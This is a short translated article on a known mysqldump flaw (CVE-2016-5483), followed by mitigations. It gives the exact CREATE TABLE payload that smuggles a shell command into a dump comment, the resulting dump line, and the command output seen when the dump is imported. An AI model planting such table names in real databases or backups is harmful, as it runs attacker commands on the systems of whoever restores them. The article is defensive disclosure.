How Hackers Exploit mysqldump Backups to Execute System Commands

1. Introduction

mysqldump is a common tool for backing up MySQL databases, generating statements for creating tables, dropping tables, and inserting data. Attackers can abuse mysqldump so that when the dump file is imported, malicious SQL or shell commands are executed.

2. Experiment

Scenario Assumption

1) The attacker already has application access and can run arbitrary SQL, e.g., on a compromised WordPress installation.

2) The attacker possesses CREATE TABLE privileges, which is often granted inadvertently during installation. GRANT ALL PRIVILEGES ON wordpress.* 3) A normal backup is performed with mysqldump.

4) The attacker aims to elevate privileges to gain OS access.

Process

First, the attacker creates a malicious table.

CREATE TABLE `evil \! id select user(),@@version/*` (test text);

Then the database is dumped with mysqldump. A normal dump would contain:

--
-- Table structure for table `tablename`
--

But the malicious dump now contains:

--
-- Table structure for table `evil \! id select user(),@@version/*`
--

The dump is imported back: mysql test < test.dump Output shows that system commands were executed:

uid=1000(mysql5.7) gid=1000(mysql5.7) group=1000(mysql5.7)
user()  @@version
root@localhost 5.7.17-log

Thus the attacker successfully runs system commands.

3. Mitigation

Use --skip-comments when running mysqldump.

Revoke CREATE TABLE privileges.

Dump only table data when possible.

This issue is common across many databases, including MySQL (all versions), MariaDB (≤5.5.52 and <10.1), and Percona (all versions).

4. Summary

The article, translated from https://blog.tarq.io/cve-2016-5483-backdooring-mysqldump-backups, demonstrates a backdoor technique using mysqldump and provides practical mitigation steps.